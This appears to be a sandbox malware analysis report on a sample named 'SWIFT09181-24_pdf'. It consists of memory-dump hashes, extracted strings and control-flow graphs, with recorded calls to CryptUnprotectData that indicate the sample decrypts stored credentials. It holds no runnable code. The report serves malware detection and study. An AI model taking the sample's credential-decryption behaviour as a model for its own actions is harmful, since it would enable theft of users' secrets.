                                                                                                                                    • Instruction ID: af3706c98495980e980a573d60a7f5da8ba10e379cf71a2d8bc701c9a3ccc7c1
                                                                                                                                    • Opcode Fuzzy Hash: 9ed30bf50f7bce0c36e99e732d8407e8b8d744ce3c5b49a1e45278b7ccbbab4e
                                                                                                                                    • Instruction Fuzzy Hash: 42A26E70A04209DFCB15CF68C994AAEBBF2BF88301F158569E815DF261D734ED89CB61
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$Hbq
                                                                                                                                    • API String ID: 0-662517225
                                                                                                                                    • Opcode ID: b3ada3af8f18def38d7e87544ddf363f3a5de89d16c44ff731b587e91d23b9e6
                                                                                                                                    • Instruction ID: 1b9372ae810c0f6bfc97f4e150f110816e43de50e570e1325114b6810f3571bf
                                                                                                                                    • Opcode Fuzzy Hash: b3ada3af8f18def38d7e87544ddf363f3a5de89d16c44ff731b587e91d23b9e6
                                                                                                                                    • Instruction Fuzzy Hash: AB128F71A00619CFDB14DFA9C854AAEBBF6FF88301F148569E819DB391DB309D85CB90
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Te^q
                                                                                                                                    • API String ID: 0-671973202
                                                                                                                                    • Opcode ID: 79c79e25fa61aea72beac93f82387e1a0c445c2e1f0ff36ef73738eb26b5e53e
                                                                                                                                    • Instruction ID: 72a991e182d68b2edaa6c975e859d8e78a4510550f1d80e8cf23b4cc89d58963
                                                                                                                                    • Opcode Fuzzy Hash: 79c79e25fa61aea72beac93f82387e1a0c445c2e1f0ff36ef73738eb26b5e53e
                                                                                                                                    • Instruction Fuzzy Hash: 1772C274A05218CFDB25DF64C994BA9B7B2FB89301F1084E9D809B73A4CB719E86DF50
                                                                                                                                    APIs
                                                                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3791DA45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                    • Opcode ID: fe4de39160662058438cb34fb75418b012db58666075d5a3cf35944f8a98b8b8
                                                                                                                                    • Instruction ID: e1ffde6d9669a36066c1a6c6a141aa56ec226c75e6beab66ba366ce66dab931b
                                                                                                                                    • Opcode Fuzzy Hash: fe4de39160662058438cb34fb75418b012db58666075d5a3cf35944f8a98b8b8
                                                                                                                                    • Instruction Fuzzy Hash: 0C1126B6800349EFDB10CF99D944BDEBFF4EB48324F148429E954A7211C339A590DFA5
                                                                                                                                    APIs
                                                                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 3791DA45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                    • Opcode ID: 135c4027300a9b819f50e45fe585d637eee4ac3a04f274d02d99a5b4db7848f2
                                                                                                                                    • Instruction ID: 694e6d6e73aa22eb3344b164db76a89ec784227223be8d91171fcbef12e7b44c
                                                                                                                                    • Opcode Fuzzy Hash: 135c4027300a9b819f50e45fe585d637eee4ac3a04f274d02d99a5b4db7848f2
                                                                                                                                    • Instruction Fuzzy Hash: 7F1144B2800249EFDB10CF99C945BEEBFF4EB48320F148419E918A7210C379A950CFA5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 81a832ccffc359d195f0a8b941782d80e4dbf2b9935540d92bda11d4f0247eae
                                                                                                                                    • Instruction ID: 2cafaec8f2feee11f7690c4cf5e331f266688233f59511dc17c89aca1bd24ec2
                                                                                                                                    • Opcode Fuzzy Hash: 81a832ccffc359d195f0a8b941782d80e4dbf2b9935540d92bda11d4f0247eae
                                                                                                                                    • Instruction Fuzzy Hash: C572BC74E052288FEB64DF69C984BD9BBB2BB89300F1491E9E40DA7351DB349E81CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 72ba9eb03fed7559defb6505208f0360b4e0daf070ed107f37f85ead91796c6a
                                                                                                                                    • Instruction ID: 60da7567ba9af8b3430c1b2d0c0049f401d795f2e4c841dbe8ab4308869ec211
                                                                                                                                    • Opcode Fuzzy Hash: 72ba9eb03fed7559defb6505208f0360b4e0daf070ed107f37f85ead91796c6a
                                                                                                                                    • Instruction Fuzzy Hash: 7BE1C074E01218CFEB24CFA5C994B9DBBB2BF89304F2081A9D408BB395DB755A85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3d5a2b65ee3561c51a0fdce0288d7fdf9602870338a4a1462810442c3691d6e3
                                                                                                                                    • Instruction ID: 71a48061f1eab9010ef3bdc803946e3eff1890e01ac6b3196fe317a8f161ec40
                                                                                                                                    • Opcode Fuzzy Hash: 3d5a2b65ee3561c51a0fdce0288d7fdf9602870338a4a1462810442c3691d6e3
                                                                                                                                    • Instruction Fuzzy Hash: ACD1C274E00218CFEB14DFA5C954B9DBBB2BF89305F1081A9D809BB364DB759A86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0e02faebcaf752a361ca773cd0756f058667a623fd64e4dc853e4732d2e17003
                                                                                                                                    • Instruction ID: 8954051c117bb814c7fa36f4da1fb29240ee1bff663a0cc1bf9d2b3fa056682a
                                                                                                                                    • Opcode Fuzzy Hash: 0e02faebcaf752a361ca773cd0756f058667a623fd64e4dc853e4732d2e17003
                                                                                                                                    • Instruction Fuzzy Hash: 27C1BE74E00218CFEB54DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ee2b2c36b25d6ae7125013f68d2eb4713c11090740e48be1141fc44f3d524731
                                                                                                                                    • Instruction ID: 681cc4a3f2b8ac34ce273861a50f9b8d2c0e39b803541b31ff33d44f382a4b15
                                                                                                                                    • Opcode Fuzzy Hash: ee2b2c36b25d6ae7125013f68d2eb4713c11090740e48be1141fc44f3d524731
                                                                                                                                    • Instruction Fuzzy Hash: 16A1E674D00208CFEB14DFA9C5847DDBBB1FF89314F209269E408AB2A1DB759985CF55
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 911ca034369032d5f2e1fc4758c563e6f155ece67199e2e57d8d7ea3c35f8262
                                                                                                                                    • Instruction ID: 871ab191c26cd3946d1b34749849133be576ce3585e961704fe50f6eaa5f8edc
                                                                                                                                    • Opcode Fuzzy Hash: 911ca034369032d5f2e1fc4758c563e6f155ece67199e2e57d8d7ea3c35f8262
                                                                                                                                    • Instruction Fuzzy Hash: CDA1F574D00208CFEB14DFA9C584BDDBBB1FF89314F209269E408A72A1DB759985CF55
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d8bb72d61526963974334e9911c6808facff5455024ac9342b87318c00d8cceb
                                                                                                                                    • Instruction ID: ce54c15fd5b471863dce45dc802dd463e3093863db8a016946a41eb120b0ae90
                                                                                                                                    • Opcode Fuzzy Hash: d8bb72d61526963974334e9911c6808facff5455024ac9342b87318c00d8cceb
                                                                                                                                    • Instruction Fuzzy Hash: 0BA191B5E012288FEB24CF6AC944B9DBBF2AF89300F14C0AAD508A7255DB745A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7079e63bf053350a465f5945d843740a13c6dc3b64dbdec01bae2e50a873d17a
                                                                                                                                    • Instruction ID: 7f2c0bed9668930583275c32a2bfca0ccb2973b0c3f4111f5f203d92068d9596
                                                                                                                                    • Opcode Fuzzy Hash: 7079e63bf053350a465f5945d843740a13c6dc3b64dbdec01bae2e50a873d17a
                                                                                                                                    • Instruction Fuzzy Hash: A4A182B5E012188FEB28CF6AC944B9DBBF2AF89300F14C1AAD40DB7255DB745A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c37fb5a8d4b8ad3c776230c38126ca37105947e884ff1e4f6770357a61b44f3f
                                                                                                                                    • Instruction ID: f562fc8917d68b2c6b56be1d42ada21f0d8b84a0d7b2c33c41e1abf38d098b9f
                                                                                                                                    • Opcode Fuzzy Hash: c37fb5a8d4b8ad3c776230c38126ca37105947e884ff1e4f6770357a61b44f3f
                                                                                                                                    • Instruction Fuzzy Hash: 1DA192B5E012188FEB68CF6AC944B9DBBF2BF89300F14D0AAD40CA7255DB345A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 975ca32194c90dc42f8f7dda401963e659bac2592a46f91d30fa4cacfbbd992d
                                                                                                                                    • Instruction ID: 48c19a617f4a0ae68ef76d1cf52ac2003366db25ead46d3992384d957a60475c
                                                                                                                                    • Opcode Fuzzy Hash: 975ca32194c90dc42f8f7dda401963e659bac2592a46f91d30fa4cacfbbd992d
                                                                                                                                    • Instruction Fuzzy Hash: 00A192B4E012288FEB24CF6AC944B9DBBF2BF89300F14D1AAD409B7255DB345A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 56ab262fe77f3e8538abfef6111f7632f0cfdb0e7b7eb74e93be6c2e14df30b3
                                                                                                                                    • Instruction ID: 52e340ac6e82ef21de793451b599abea51fc53d2f22f73e28447a54db3eb68e6
                                                                                                                                    • Opcode Fuzzy Hash: 56ab262fe77f3e8538abfef6111f7632f0cfdb0e7b7eb74e93be6c2e14df30b3
                                                                                                                                    • Instruction Fuzzy Hash: 1891D274D00208CFEB10DFA9C989BDCBBB1FF49314F209269E409AB2A1DB759985CF55
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f89157a5f6f92b8c30f2cd89dc71db8dbb0218827f779c8e73c780ec23176b40
                                                                                                                                    • Instruction ID: 2cd8a1a0a699c54c68432c00828805ca1b507d99708ea04c5c2182ad6722ebec
                                                                                                                                    • Opcode Fuzzy Hash: f89157a5f6f92b8c30f2cd89dc71db8dbb0218827f779c8e73c780ec23176b40
                                                                                                                                    • Instruction Fuzzy Hash: 6481F674E01608CBEB14DFEAD95069DBBF2BF88300F24D529E814AB355EB345942CF55
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a79f3099acd54657725c129b43380af449c870ed169f428976bccd3d0bc57ff6
                                                                                                                                    • Instruction ID: 5afb0af389dae3d8c5c0a281b5db41ee3bf8af7ea531a2b9b10cbf5f3ae15293
                                                                                                                                    • Opcode Fuzzy Hash: a79f3099acd54657725c129b43380af449c870ed169f428976bccd3d0bc57ff6
                                                                                                                                    • Instruction Fuzzy Hash: A371B675D06228CFEB64CFA6C9847DDBBB2BF89301F1490AAD409B7254DB355A86CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e3b8fff0ccabaf1678aba774f16d21648f2ccefc1bdfc43e980339cbceae0683
                                                                                                                                    • Instruction ID: 7d88556ee3f2c1f0ef6557735f3a90bc0de80f45c694a76c58b298c5d7b24a5a
                                                                                                                                    • Opcode Fuzzy Hash: e3b8fff0ccabaf1678aba774f16d21648f2ccefc1bdfc43e980339cbceae0683
                                                                                                                                    • Instruction Fuzzy Hash: 978193B4E016188FEB28CF6AC954B8DFBF2AF89200F14C1EAD40CA7255DB345A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5d5e43222a5f8dd423bbdf8f44c40b418df50ea26682126b36a4f069b97bce51
                                                                                                                                    • Instruction ID: 1f161e7e8988c71f43dafa3549967f34456f5008ad80dd83b18eb19444478436
                                                                                                                                    • Opcode Fuzzy Hash: 5d5e43222a5f8dd423bbdf8f44c40b418df50ea26682126b36a4f069b97bce51
                                                                                                                                    • Instruction Fuzzy Hash: 088183B5E016188FEB68CF6AC944B9DBBF2AF89300F14C1EAD40CA7255DB345A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d3ea69247789fa24ce19707266be03c6a7d636f0d7a1920d2ded6b28a1c076bd
                                                                                                                                    • Instruction ID: 0c101a081f766d223389ac285d19931c2feb65f6db5397e95db2c48080b1ce6d
                                                                                                                                    • Opcode Fuzzy Hash: d3ea69247789fa24ce19707266be03c6a7d636f0d7a1920d2ded6b28a1c076bd
                                                                                                                                    • Instruction Fuzzy Hash: BB516AB1E016188BEB58CF6BC945789FBF3AFC9204F14C1AAC50CA6255DB7419868F51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: aeaf07431ad71b35bfd8943dcc0727188130d08146627812632e58ea4b332b9c
                                                                                                                                    • Instruction ID: 22f8322773584e0bff0acf6ae1f8d155c42481170e47305559365bbf8df1bf4d
                                                                                                                                    • Opcode Fuzzy Hash: aeaf07431ad71b35bfd8943dcc0727188130d08146627812632e58ea4b332b9c
                                                                                                                                    • Instruction Fuzzy Hash: 844167B1D016188BEB58CF6BC9447CAFBF3AFC9200F14C1AAD50CA6254EB740A858F51

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 1566b8-1566ed 1 1566f3-156716 0->1 2 156b1c-156b20 0->2 11 1567c4-1567c8 1->11 12 15671c-156729 1->12 3 156b22-156b36 2->3 4 156b39-156b47 2->4 9 156b49-156b5e 4->9 10 156bb8-156bcd 4->10 17 156b65-156b72 9->17 18 156b60-156b63 9->18 19 156bd4-156be1 10->19 20 156bcf-156bd2 10->20 15 156810-156819 11->15 16 1567ca-1567d8 11->16 28 156738 12->28 29 15672b-156736 12->29 21 156c2f 15->21 22 15681f-156829 15->22 16->15 36 1567da-1567f5 16->36 24 156b74-156bb5 17->24 18->24 25 156be3-156c1e 19->25 20->25 30 156c34-156c4d 21->30 22->2 26 15682f-156838 22->26 73 156c25-156c2c 25->73 34 156847-156853 26->34 35 15683a-15683f 26->35 31 15673a-15673c 28->31 29->31 31->11 38 156742-1567a4 31->38 34->30 41 156859-15685f 34->41 35->34 57 1567f7-156801 36->57 58 156803 36->58 82 1567a6 38->82 83 1567aa-1567c1 38->83 43 156865-156875 41->43 44 156b06-156b0a 41->44 55 156877-156887 43->55 56 156889-15688b 43->56 44->21 47 156b10-156b16 44->47 47->2 47->26 59 15688e-156894 55->59 56->59 60 156805-156807 57->60 58->60 59->44 63 15689a-1568a9 59->63 60->15 64 156809 60->64 68 156957-156982 call 156500 * 2 63->68 69 1568af 63->69 64->15 86 156a6c-156a86 68->86 87 156988-15698c 68->87 71 1568b2-1568c3 69->71 71->30 75 1568c9-1568db 71->75 75->30 77 1568e1-1568f9 75->77 140 1568fb call 156c98 77->140 141 1568fb call 156c88 77->141 81 156901-156911 81->44 85 156917-15691a 81->85 82->83 83->11 88 156924-156927 85->88 89 15691c-156922 85->89 86->2 109 156a8c-156a90 86->109 87->44 91 156992-156996 87->91 88->21 92 15692d-156930 88->92 89->88 89->92 94 1569be-1569c4 91->94 95 156998-1569a5 91->95 96 156932-156936 92->96 97 156938-15693b 92->97 99 1569c6-1569ca 94->99 100 1569ff-156a05 94->100 112 1569b4 95->112 113 1569a7-1569b2 95->113 96->97 98 156941-156945 96->98 97->21 97->98 98->21 101 15694b-156951 98->101 99->100 102 1569cc-1569d5 99->102 103 156a07-156a0b 100->103 104 156a11-156a17 100->104 101->68 101->71 107 1569e4-1569fa 102->107 108 1569d7-1569dc 102->108 103->73 103->104 110 156a23-156a25 104->110 111 156a19-156a1d 104->111 107->44 108->107 117 156a92-156a9c call 1553a8 109->117 118 156acc-156ad0 109->118 114 156a27-156a30 110->114 115 156a5a-156a5c 110->115 111->44 111->110 116 1569b6-1569b8 112->116 113->116 120 156a32-156a37 114->120 121 156a3f-156a55 114->121 115->44 122 156a62-156a69 115->122 116->44 116->94 117->118 128 156a9e-156ab3 117->128 118->73 124 156ad6-156ada 118->124 120->121 121->44 124->73 127 156ae0-156aed 124->127 131 156afc 127->131 132 156aef-156afa 127->132 128->118 137 156ab5-156aca 128->137 134 156afe-156b00 131->134 132->134 134->44 134->73 137->2 137->118 140->81 141->81
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                    • API String ID: 0-1932283790
                                                                                                                                    • Opcode ID: 448eb57d44ebae67c2d2e48b170f549ef33cdee74d07a5b4fb881cf99a1eae30
                                                                                                                                    • Instruction ID: 163e508bffc7727ec8f6a33fc386a9c0c41d87ee7b6c76754d2d69c40ce6acaa
                                                                                                                                    • Opcode Fuzzy Hash: 448eb57d44ebae67c2d2e48b170f549ef33cdee74d07a5b4fb881cf99a1eae30
                                                                                                                                    • Instruction Fuzzy Hash: FD125930A00208DFCB15CF69D984A9EBBF2FF48315F558569E869DB261DB30ED49CB90

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 142 1519b8-151a13 146 151a35-151a84 142->146 147 151a15-151a34 142->147 151 151a86-151a8d 146->151 152 151a9f 146->152 153 151a96-151a9d 151->153 154 151a8f-151a94 151->154 156 151aa7 152->156 155 151aaa-151abe 153->155 154->155 158 151ad4-151adc 155->158 159 151ac0-151ac7 155->159 156->155 162 151ade-151ae2 158->162 160 151acd-151ad2 159->160 161 151ac9-151acb 159->161 160->162 161->162 164 151ae4-151af9 162->164 165 151b42-151b45 162->165 164->165 173 151afb-151afe 164->173 166 151b47-151b5c 165->166 167 151b8d-151b93 165->167 166->167 177 151b5e-151b62 166->177 168 15268e 167->168 169 151b99-151b9b 167->169 174 152693-152ca1 168->174 169->168 171 151ba1-151ba6 169->171 175 15263c-152640 171->175 176 151bac 171->176 178 151b00-151b02 173->178 179 151b1d-151b3b call 1502a8 173->179 202 152ca3-152ca5 174->202 203 152cb2-152cba 174->203 181 152647-15268d 175->181 182 152642-152645 175->182 176->175 183 151b64-151b68 177->183 184 151b6a-151b88 call 1502a8 177->184 178->179 185 151b04-151b07 178->185 179->165 182->174 182->181 183->167 183->184 184->167 185->165 186 151b09-151b1b 185->186 186->165 186->179 204 152ca7-152ca9 202->204 205 152cab-152cb0 202->205 207 152cbc-152cca 203->207 204->207 205->207 209 152ce0-152ce8 207->209 210 152ccc-152cce 207->210 213 152ceb-152cee 209->213 211 152cd7-152cde 210->211 212 152cd0-152cd5 210->212 211->213 212->213 215 152d05-152d09 213->215 216 152cf0-152cfe 213->216 217 152d22-152d25 215->217 218 152d0b-152d19 215->218 216->215 224 152d00 216->224 219 152d27-152d2b 217->219 220 152d2d-152d62 217->220 218->217 225 152d1b 218->225 219->220 223 152d64-152d7b 219->223 229 152dc4-152dc9 220->229 226 152d81-152d8d 223->226 227 152d7d-152d7f 223->227 224->215 225->217 230 152d97-152da1 226->230 231 152d8f-152d95 226->231 227->229 232 152da9 230->232 233 152da3 230->233 231->232 236 152db1-152dbd 232->236 233->232 236->229
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                                                                                                    • API String ID: 0-1317942629
                                                                                                                                    • Opcode ID: 671f9ba36d0cc09941140ff91bf368ee781361e9253828659776a7208ce42f64
                                                                                                                                    • Instruction ID: f4787dc35562d26b43163cf8a13c33d68d24194ef28d258b19354f9bb2b7b918
                                                                                                                                    • Opcode Fuzzy Hash: 671f9ba36d0cc09941140ff91bf368ee781361e9253828659776a7208ce42f64
                                                                                                                                    • Instruction Fuzzy Hash: D442FAA7E1D3E18FCB124B705CB82597FB17B22106BDE459EC8C297287EBA58485C353

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
